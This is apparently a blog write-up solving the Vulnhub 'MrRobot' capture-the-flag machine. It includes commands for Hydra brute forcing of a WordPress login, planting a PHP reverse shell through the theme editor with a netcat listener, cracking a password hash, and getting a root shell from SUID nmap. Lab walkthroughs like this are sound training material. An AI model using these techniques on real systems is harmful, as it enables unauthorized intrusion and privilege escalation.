Vulnhub Writeup : MrRobot

Box Stats :

Box InformationDetails
Box NameMrRobot
Release Date28 Jun 2016
AuthorLeon Johnson
Download LinkLink

Network Scan

The IP of target vm is

$ nmap -sV -oN target.scan
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
443/tcp open   ssl/http Apache httpd

There are only two ports open. At port 80 the web page is available, but there’s nothing any interesting data.

Web App Recon

Directory Bruteforce

Scanning the target web server for hidden urls and other stuffs

$ dirb -o dirb.scan

It seem there have some problem on scanning(because i am running attacker machine on docker container), so i need to use -w option to ignore the warning.

$ dirb -o dirb.scan

Scanning wordpress site

$ wpscan --url

Some of the important findings are :


where at` a wordpress website is hosted.

Now the robots.txt file have some interested things, so first download it.

$ wget
--2019-11-13 15:52:46--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 41 [text/plain]
Saving to: 'robots.txt'
robots.txt           100%[========================>]      41  --.-KB/s    in 0s
2019-11-13 15:52:46 (4.69 MB/s) - 'robots.txt' saved [41/41]
$ cat robots.txt
User-agent: *

As we can see that we find our first key and a another file fsocity.dic, now download it.

$ wget
$ cat key-1-of-3.txt

It contains the flag value. Now lets check another file.

$ wget

This file contains the list of 858160 words.

wc -l fsocity.dic

Now let sort the file and remove duplicates

$ cat fsocity.dic | sort | uniq > fsocity_sorted.dic

Now the file length is 11451. This list can be login for the wordpress website. So try to bruteforce the wordpress login with this list. First we bruteforce the username field then password field. For bruteforec we are going to use hydra.

BruteForcing WordPress Login with Hydra

For basics use hydra refer to this Link.

Bruteforcing username:

$ hydra -vV -L fsocity_sorted.dic -p randompass http-post-form  \
   "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:Invalid username" -o success

Where -o success option is used to store result working keys. Contents of success file :

[80][http-post-form] host:   login: ELLIOT   password: randompass
[80][http-post-form] host:   login: Elliot   password: randompass
[80][http-post-form] host:   login: elliot   password: randompa

the username is found, then we can bruteforce the password file with same list.

$ hydra -vV -l elliot -P fsocity_sorted.dic http-post-form \ 

Password fount : ER28-0652

We can also use wpscan, for example :

$ wpscan --url --usernames elliot --passwords \
    fsocity_sorted.dic --wp-content-dir ""

Droping Backdoor on WordPress

First login to wordpress with above credentials and go to Appearance > Editor

Get the php reverse shell code from : Click here to download

Change the IP on script to your attacker machine and port number then put it on the Main Index page

Now start backdoor listener

$ nc -vvlp 1234

And open wordpress index file.

ajay@MBot:~$ nc -vvlp 1234
Listening on [] (family 0, port 1234)
Connection from 47906 received!
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
 00:13:18 up  3:57,  0 users,  load average: 0.00, 0.08, 0.46
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off

In the /home/robot folder we found 2nd key file, currently we don’t have the permission to open it.

$ cd home/robot
$ ls
$ cat key-2-of-3.txt
cat: key-2-of-3.txt: Permission denied
$ whoami

But we the permission to read password.raw-md5 file

$ cat password.raw-md5

which looks like md5 unsalted password hash. Now to crack that we can use JTR(John the ripper) or john password cracking tool.

$ cat passhash.txt
$ john passhash.txt

But it takes time, so we can also use online hash cracking service from

So the password is :


Now lets try to login as robot with above password

$ sudo robot
sudo: no tty present and no askpass program specified
$ python -c 'import pty; pty.spawn("/bin/bash")'  
daemon@linux:/home/robot$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz
robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt

We can get 2nd flag also. Note that the python -c 'import pty; pty.spawn("/bin/bash")' is used to spawn a tty shell.

Privilege Escalation to root

There are various methods for privilege escalation, which can be found here : Link (Click Here)

For this VM first we try to find a binary with SUID root.

$ find / -perm -4000 -user root -exec ls -ld {} \; 2>/dev/null

-rwsr-xr-x 1 root root 44168 May  7  2014 /bin/ping
-rwsr-xr-x 1 root root 69120 Feb 12  2015 /bin/umount
-rwsr-xr-x 1 root root 94792 Feb 12  2015 /bin/mount
-rwsr-xr-x 1 root root 44680 May  7  2014 /bin/ping6
-rwsr-xr-x 1 root root 36936 Feb 17  2014 /bin/su
-rwsr-xr-x 1 root root 47032 Feb 17  2014 /usr/bin/passwd
-rwsr-xr-x 1 root root 32464 Feb 17  2014 /usr/bin/newgrp
-rwsr-xr-x 1 root root 41336 Feb 17  2014 /usr/bin/chsh
-rwsr-xr-x 1 root root 46424 Feb 17  2014 /usr/bin/chfn
-rwsr-xr-x 1 root root 68152 Feb 17  2014 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 155008 Mar 12  2015 /usr/bin/sudo
-rwsr-xr-x 1 root root 504736 Nov 13  2015 /usr/local/bin/nmap
-rwsr-xr-x 1 root root 440416 May 12  2014 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10240 Feb 25  2014 /usr/lib/eject/dmcrypt-get-device
-r-sr-xr-x 1 root root 9532 Nov 13  2015 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
-r-sr-xr-x 1 root root 14320 Nov 13  2015 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
-rwsr-xr-x 1 root root 10344 Feb 25  2015 /usr/lib/pt_chown

At above we use find commands which finds files with SUID and then -exec options will run ls -ld command on the file, 2>/dev/null will redirect all the errors.

Now there is an interesting finding :

-rwsr-xr-x 1 root root 504736 Nov 13  2015 /usr/local/bin/nmap

Now there is a method to get root shell with nmap (if it support –interactive option`), which can be found on this article :

Now get a root shell with nmap

$ nmap --interactive
Starting nmap V. 3.81 ( )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
# whoami

!! We get a root shell. Now lets find 3rd key.

# cd /root
cd /root
# ls
firstboot_done key-3-of-3.txt
# cat key-3-of-3.txt
cat key-3-of-3.txt

Thats it. !!!

We found all the keys.

Leave a Reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.